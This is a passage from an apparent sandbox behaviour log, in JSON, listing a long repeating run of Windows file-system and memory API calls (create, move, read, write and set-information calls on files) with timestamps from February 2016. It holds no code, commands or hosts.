"timestamp": "2016-02-16 17:41:42,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,293", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,313", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,323", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,393", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,433", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,463", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,483", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,553", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,563", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,573", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,573", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,583", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,583", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,593", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,593", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,603", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,603", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,613", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,613", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,623", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,623", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,633", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,643", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,643", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,653", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,653", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,663", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,663", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,684", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,684", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 